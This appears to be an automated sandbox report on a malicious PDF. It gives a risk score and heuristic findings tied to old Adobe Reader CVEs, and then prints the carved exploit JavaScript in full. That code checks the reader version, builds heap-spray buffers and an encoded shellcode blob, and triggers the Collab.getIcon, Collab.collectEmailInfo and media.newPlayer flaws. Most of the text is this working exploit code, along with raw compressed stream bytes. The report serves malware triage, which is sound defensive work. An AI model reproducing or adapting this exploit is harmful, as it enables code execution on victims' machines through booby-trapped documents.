MALICIOUS
372
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. Heuristics indicate the presence of embedded JavaScript, suggesting an attempt to execute code. The specific intent of the script cannot be determined due to obfuscation, but it is likely to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9982
Heuristics 10
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var ret = unescape("%u0c0c%u0c0c"); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/photoshop/1.0/In PDF document text
Extracted artifacts 5
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0043_000.js |
pdf-javascript-stream | PDF /JS object 43 at offset 0x2430 | 2172 bytes |
SHA-256: 6a4feff50242ca48bccb7b8303874c63d44c492cea43499d20ce94d354dc031d |
|||
Preview scriptFirst 1,000 lines of the extracted script
<</Length 2116/Filter[/FlateDecode]>>stream
H�� ko�F� �?� � !EY��%U[ � �"i����^� Kjצ�ב�%�� ���\ʒ�+ � off�������EV�˅�.V3�̼��Wg �p��n=vz �ޥ� � ;o&�77
Sf�2 b5�p 1PW<E+D�. @��<��:o�l�efk)WŔW|� a�Ʉr� d4n�
`Y���(3� 5Z�+�pK���|�fHg��� Ȗ���ˮ���� Z��6�� 9���Mu{�%z@>3��� 0 � 8j̰\�eU� � ��< >Ŭ��� ��: �e� /��y[ |�6>�+� { �r B��*�����6��ZՅ��~_�}�O �S��͖�E5���IՃJQ����5r9߁ ��cG]�
��? ^�8 �JqB�d I L�x2IR�&�0#��i � �3# 0�
��, � u�HA�JI x �I �CE ) �" p�r�((%P )�t � #�S 2ead�<���F E� �� ���ũ��T*j ���ц � �p���HC��- U|�d�j �S��I�J�L#��� ��� !O��d� ��@��gx Lb������ Ir$�&£ &CL`ŧ��1d�� r �� ��&� �+9ș�� � 䑺�L6�ޞُځ ) �3"Q�֮%OQ�>�&��r ̩@iQ�i�xv�/}WsJ ct1� �X%�X�@�V �:< i"�� й�d � %�hOm�h�%�z G��ٌ���x��A #��� fy��76���- S� ��� gv� j�Q ,9��h�F ���H��5,�3D{m� �0� �c�ڶS����#��N� �cu �OŹ��)9uǡ�g<: �� F�( D�����<U�5O|bzP�=B U���/�n= +����vY� ��t����<�M�# ����6|����Գ+4wۉ�
&l:���� 5^H�B�g �詞�mB�N�ּ���~�f�N���w.H�'���V ��8�� d���������xh ���]��?��c;73���I���9-G�)5S]��`O��A/�v| �Z$�_"����2�fO�� �; �VL�滮ݿz� �����V �W;k{ � i�l��cۗ F6��iL=� ��+?4;�� h�c~JBbf��djE #f0�d� X�O}י�AK�i~���5�� g���u ����+�zF��*q=�}�N�� ��9� � ���u���լ~�N�j�K D�l�d� ��y"����m$�n���
�ǂ��8���L��/�]_�ys� x� ��r��|. �z*�_�f<UbX�X�:\�#8��JT��]�>�B��ڻ� TB4F* g��+pd��� �T4��'�)�ظ��5�H�a�ke G�^ Yʂ�u ��q�d1�3Q� � 0�ɋuL� ��a�� ��q���� `J�݀*��&�a� 0��c wc )�P�1TP� ��A�䫳*q�ƌ! ȏ#6��ln�p!6ÙX�T����!� ��S � ��� u �봬�|q㒁�s^;���Q����؍ b�-
�s�&�,�|L.�+�
��e���
7W���c�R ��$a ���|6\��j����w?��� ����??�2 �~���}�K?/g��泜��� �R�=��� � �X�������'?���q���� >o��?��>���f������s U�s �ۼ ��4�C ��(��z6�.���W٭+���=�PS���+��xQA���z��5�K����! Q�K � ��؉�� :Fz5� m��~@ �ZOI
� Pm���j��<��Q>�|\���ѐ2U�T�j�A�*9 cl��g� �TElpXFO�� B~&f�p� � B � ��쀋���� '���ǎ �ݳm�g
k �]�2 0 ���S��w��O�g� 7� 7d�$_��
� ��*w��p�$�� � �N O��Cي��R���� ,` ��g:�xݲ�n �좽- 3���e*��Z4�b����q�x�y
? ~#M�e�� S�` = ��V�����Vy�T�������A����~EV��� �������[�p��O ��� W�@<�k�?_�+�� ��� �J >�4!k � p4�rY cJQ�#��_֕��۳7�a� �ܱґpy� i�#J��N�ɱ���Cif� �x��?22� �Xy�Iu�tz�5� �F���C��4�Lh����3CE��m��GoY�{|j8T �.� L�"�
endstrea
|
|||
javascript_obj0043_001.js |
pdf-javascript-stream | PDF /JS object 43 at offset 0x2465 | 6463 bytes |
SHA-256: 72a7a81874bc825243697fb1380a9dc969da68bf826f90ff5241fdd360dd07a9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
var s = "XX23ebXX4840XX5f43XX5b57XX8b66XX3c03XX7430XX2c1bXXc063XX04e0XXec80XX8043XX0fe4XXc402XXea34XX0788XX4343XXeb47XXe8e3XXffd8XXffffXX4e69XX4963XX4d71XX4571XX4d71XX4d71XX4d6bXX4563XX4d71XX4d71XX4d71XX4d71XX446eXX4e69XX4463XX4967XX4d72XX4d6dXX4d71XX4463XX4d70XX4f72XX526bXX4364XX4d72XX4963XX506aXX4c71XX4971XX4967XX4571XX4366XX4f6cXX4a67XX446aXX4a6cXX4866XX4464XX506aXX4a64XX4871XX476cXX4566XX4b63XX4c6cXX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4f67XX4c64XX4e6fXX4d6cXX516bXX4e67XX4d70XX4d71XX4d71XX4d71XX4469XX4d6dXX4971XX4469XX4d6cXX4972XX4a67XX4469XX4d6dXX4571XX4669XX4c69XX4a65XX4d72XX4d6dXX4d71XX4964XX4a69XX4468XX5268XX4d72XX4d6dXX4d71XX4c70XX4665XX4e68XX4f71XX4563XX506fXX4e71XX4d71XX4d71XX4c69XX5065XX5171XX4b63XX4f64XX4964XX4c70XX4d65XX4c70XX4b66XX4f6bXX4368XX476eXX4c65XX4469XX4c68XX4665XX4d72XX4d6dXX4d71XX4f6bXX4469XX4f71XX4f6bXX4470XX4d66XX516cXX5171XX4f6dXX4f6dXX4463XX5164XX4669XX4c68XX4e63XX4d72XX4d6dXX4d71XX4c70XX4f64XX4a68XX4d71XX4d6fXX4d71XX4d71XX4463XX4c72XX436bXX4d71XX4f6eXX4864XX4c6aXX4e65XX4d72XX4d6dXX4d71XX4c69XX4564XX4864XX516cXX5171XX4470XX5265XX506cXX4671XX4f6dXX4e69XX4764XX4d71XX4d72XX4d71XX4d71XX4b6cXX5263XX4669XX4c68XX4666XX4d72XX4d6dXX4d71XX4469XX4563XX5271XX4d71XX4571XX4d71XX4d71XX4d6eXX436bXX4d6dXX4864XX4c6aXX4668XX4d72XX4d6dXX4d71XX4669XX4c69XX4e66XX4d72XX4d6dXX4d71XX4c71XX5265XX4669XX4c69XX5266XX4d72XX4d6dXX4d71XX436bXX4d71XX436bXX4d71XX436bXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX4a68XX4d72XX4d6dXX4d71XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4a69XX4468XX4a66XX4d72XX4d6dXX4d71XX4469XX4c6aXX4666XX4d72XX4d6dXX4d71XX4a69XX4c69XX5068XX4e72XX4d6dXX4d71XX4d6eXX4f6eXX436bXX4d71XX506eXX526eXX4f6eXX4b6eXX4864XX4c68XX4e63XX4d72XX4d6dXX4d71XX4864XX4c67XX5268XX4d72XX4d6dXX4d71XX4471XX4d65XX526cXX4b71XX4463XX4d6bXX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4469XX4f71XX4a70XX526fXX4d6eXX516dXX4f6dXX516cXX4971XX4469XX4c68XX4666XX4d72XX4d6dXX4d71XX4f6dXX4663XX446eXX4864XX4864XX4864XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4c70XX4665XX4368XX4364XX4464XX4964XX4a64XX4463XX4571XX4469XX4f71XX4470XX4b65XX516cXX4f71XX4f6dXX4e6dXX4470XX4a65XX4b6cXX5164XX4c69XX4f65XX5171XX4469XX4468XX5266XX4d72XX4d6dXX4d71XX4668XX4d71XX5071XX4d71XX4d71XX5167XX4b63XX4a64XX4469XX4468XX4e66XX4d72XX4d6dXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX4864XX4c68XX5266XX4d72XX4d6dXX4d71XX4c65XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX436bXX4d71XX4864XX4c6aXX4665XX4d72XX4d6dXX4d71XX4c65XX4d6bXX4469XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c71XX4f6cXX4970XX4469XX4f6cXX456cXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4f6eXX4469XX476dXX4572XX4469XX4f6cXX4d6fXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c70XX4d65XX4c70XX4b66XX4f6eXX4469XX4f70XX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4967XX4570XX4d63XX516cXX5071XX4e65XX4365XX4a71XX4c71XX4d66XX4463XX5164XX4470XX5072XX516cXX4671XX476eXX4c69XX4f65XX5171XX466dXX516cXX5270XX4463XX4966XX476eXX4469XX4f66XX476eXX446fXX4f6eXX4d6fXX446fXX4c6aXX4a65XX4d72XX4d6dXX4d71XX4e66XX4363XX4c71XX4f6eXX516fXX4c71XX4c6aXX4a65XX4d72XX4d6dXX4d71XX4871XX5068XX4b71XX4e65XX4d63XX4b71XX4c71XX4f6dXX4972XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4469XX4d71XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4669XX5071XX4463XX4e71XX476eXX4e6bXX4c65XX3030"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
|
|||
javascript_obj0043_001_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 43 at offset 0x2465 | 72 bytes |
SHA-256: 1d18be7a9a735b4efb9816cbf36ca8f2995fa7e3951c97e5ce9977168aa1280b |
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery marker-XX-to-%u from combined JavaScript objects at offset 0x2430 | 5838 bytes |
SHA-256: 16ae11897d85015a75a4476aa5d780ff0fb25880746f1a6e954a1c4f5329200c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71%u4463%u4d70%u4f72%u526b%u4364%u4d72%u4963%u506a%u4c71%u4971%u4967%u4571%u4366%u4f6c%u4a67%u446a%u4a6c%u4866%u4464%u506a%u4a64%u4871%u476c%u4566%u4b63%u4c6c%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4f67%u4c64%u4e6f%u4d6c%u516b%u4e67%u4d70%u4d71%u4d71%u4d71%u4469%u4d6d%u4971%u4469%u4d6c%u4972%u4a67%u4469%u4d6d%u4571%u4669%u4c69%u4a65%u4d72%u4d6d%u4d71%u4964%u4a69%u4468%u5268%u4d72%u4d6d%u4d71%u4c70%u4665%u4e68%u4f71%u4563%u506f%u4e71%u4d71%u4d71%u4c69%u5065%u5171%u4b63%u4f64%u4964%u4c70%u4d65%u4c70%u4b66%u4f6b%u4368%u476e%u4c65%u4469%u4c68%u4665%u4d72%u4d6d%u4d71%u4f6b%u4469%u4f71%u4f6b%u4470%u4d66%u516c%u5171%u4f6d%u4f6d%u4463%u5164%u4669%u4c68%u4e63%u4d72%u4d6d%u4d71%u4c70%u4f64%u4a68%u4d71%u4d6f%u4d71%u4d71%u4463%u4c72%u436b%u4d71%u4f6e%u4864%u4c6a%u4e65%u4d72%u4d6d%u4d71%u4c69%u4564%u4864%u516c%u5171%u4470%u5265%u506c%u4671%u4f6d%u4e69%u4764%u4d71%u4d72%u4d71%u4d71%u4b6c%u5263%u4669%u4c68%u4666%u4d72%u4d6d%u4d71%u4469%u4563%u5271%u4d71%u4571%u4d71%u4d71%u4d6e%u436b%u4d6d%u4864%u4c6a%u4668%u4d72%u4d6d%u4d71%u4669%u4c69%u4e66%u4d72%u4d6d%u4d71%u4c71%u5265%u4669%u4c69%u5266%u4d72%u4d6d%u4d71%u436b%u4d71%u436b%u4d71%u436b%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u4a68%u4d72%u4d6d%u4d71%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4a69%u4468%u4a66%u4d72%u4d6d%u4d71%u4469%u4c6a%u4666%u4d72%u4d6d%u4d71%u4a69%u4c69%u5068%u4e72%u4d6d%u4d71%u4d6e%u4f6e%u436b%u4d71%u506e%u526e%u4f6e%u4b6e%u4864%u4c68%u4e63%u4d72%u4d6d%u4d71%u4864%u4c67%u5268%u4d72%u4d6d%u4d71%u4471%u4d65%u526c%u4b71%u4463%u4d6b%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4469%u4f71%u4a70%u526f%u4d6e%u516d%u4f6d%u516c%u4971%u4469%u4c68%u4666%u4d72%u4d6d%u4d71%u4f6d%u4663%u446e%u4864%u4864%u4864%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4c70%u4665%u4368%u4364%u4464%u4964%u4a64%u4463%u4571%u4469%u4f71%u4470%u4b65%u516c%u4f71%u4f6d%u4e6d%u4470%u4a65%u4b6c%u5164%u4c69%u4f65%u5171%u4469%u4468%u5266%u4d72%u4d6d%u4d71%u4668%u4d71%u5071%u4d71%u4d71%u5167%u4b63%u4a64%u4469%u4468%u4e66%u4d72%u4d6d%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u4864%u4c68%u5266%u4d72%u4d6d%u4d71%u4c65%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u436b%u4d71%u4864%u4c6a%u4665%u4d72%u4d6d%u4d71%u4c65%u4d6b%u4469%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c71%u4f6c%u4970%u4469%u4f6c%u456c%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4f6e%u4469%u476d%u4572%u4469%u4f6c%u4d6f%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c70%u4d65%u4c70%u4b66%u4f6e%u4469%u4f70%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4967%u4570%u4d63%u516c%u5071%u4e65%u4365%u4a71%u4c71%u4d66%u4463%u5164%u4470%u5072%u516c%u4671%u476e%u4c69%u4f65%u5171%u466d%u516c%u5270%u4463%u4966%u476e%u4469%u4f66%u476e%u446f%u4f6e%u4d6f%u446f%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4e66%u4363%u4c71%u4f6e%u516f%u4c71%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4871%u5068%u4b71%u4e65%u4d63%u4b71%u4c71%u4f6d%u4972%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4469%u4d71%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4669%u5071%u4463%u4e71%u476e%u4e6b%u4c65%u3030"
function exp8() {
var spd = "%u000a%u000a%u000a%u000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0x2430 | 8636 bytes |
SHA-256: 6b274891890bf0d519e3384adb17e8bb7394a4452b3b364e01a340896daea0d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
<</Length 2116/Filter[/FlateDecode]>>stream
H�� ko�F� �?� � !EY��%U[ � �"i����^� Kjצ�ב�%�� ���\ʒ�+ � off�������EV�˅�.V3�̼��Wg �p��n=vz �ޥ� � ;o&�77
Sf�2 b5�p 1PW<E+D�. @��<��:o�l�efk)WŔW|� a�Ʉr� d4n�
`Y���(3� 5Z�+�pK���|�fHg��� Ȗ���ˮ���� Z��6�� 9���Mu{�%z@>3��� 0 � 8j̰\�eU� � ��< >Ŭ��� ��: �e� /��y[ |�6>�+� { �r B��*�����6��ZՅ��~_�}�O �S��͖�E5���IՃJQ����5r9߁ ��cG]�
��? ^�8 �JqB�d I L�x2IR�&�0#��i � �3# 0�
��, � u�HA�JI x �I �CE ) �" p�r�((%P )�t � #�S 2ead�<���F E� �� ���ũ��T*j ���ц � �p���HC��- U|�d�j �S��I�J�L#��� ��� !O��d� ��@��gx Lb������ Ir$�&£ &CL`ŧ��1d�� r �� ��&� �+9ș�� � 䑺�L6�ޞُځ ) �3"Q�֮%OQ�>�&��r ̩@iQ�i�xv�/}WsJ ct1� �X%�X�@�V �:< i"�� й�d � %�hOm�h�%�z G��ٌ���x��A #��� fy��76���- S� ��� gv� j�Q ,9��h�F ���H��5,�3D{m� �0� �c�ڶS����#��N� �cu �OŹ��)9uǡ�g<: �� F�( D�����<U�5O|bzP�=B U���/�n= +����vY� ��t����<�M�# ����6|����Գ+4wۉ�
&l:���� 5^H�B�g �詞�mB�N�ּ���~�f�N���w.H�'���V ��8�� d���������xh ���]��?��c;73���I���9-G�)5S]��`O��A/�v| �Z$�_"����2�fO�� �; �VL�滮ݿz� �����V �W;k{ � i�l��cۗ F6��iL=� ��+?4;�� h�c~JBbf��djE #f0�d� X�O}י�AK�i~���5�� g���u ����+�zF��*q=�}�N�� ��9� � ���u���լ~�N�j�K D�l�d� ��y"����m$�n���
�ǂ��8���L��/�]_�ys� x� ��r��|. �z*�_�f<UbX�X�:\�#8��JT��]�>�B��ڻ� TB4F* g��+pd��� �T4��'�)�ظ��5�H�a�ke G�^ Yʂ�u ��q�d1�3Q� � 0�ɋuL� ��a�� ��q���� `J�݀*��&�a� 0��c wc )�P�1TP� ��A�䫳*q�ƌ! ȏ#6��ln�p!6ÙX�T����!� ��S � ��� u �봬�|q㒁�s^;���Q����؍ b�-
�s�&�,�|L.�+�
��e���
7W���c�R ��$a ���|6\��j����w?��� ����??�2 �~���}�K?/g��泜��� �R�=��� � �X�������'?���q���� >o��?��>���f������s U�s �ۼ ��4�C ��(��z6�.���W٭+���=�PS���+��xQA���z��5�K����! Q�K � ��؉�� :Fz5� m��~@ �ZOI
� Pm���j��<��Q>�|\���ѐ2U�T�j�A�*9 cl��g� �TElpXFO�� B~&f�p� � B � ��쀋���� '���ǎ �ݳm�g
k �]�2 0 ���S��w��O�g� 7� 7d�$_��
� ��*w��p�$�� � �N O��Cي��R���� ,` ��g:�xݲ�n �좽- 3���e*��Z4�b����q�x�y
? ~#M�e�� S�` = ��V�����Vy�T�������A����~EV��� �������[�p��O ��� W�@<�k�?_�+�� ��� �J >�4!k � p4�rY cJQ�#��_֕��۳7�a� �ܱґpy� i�#J��N�ɱ���Cif� �x��?22� �Xy�Iu�tz�5� �F���C��4�Lh����3CE��m��GoY�{|j8T �.� L�"�
endstrea
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
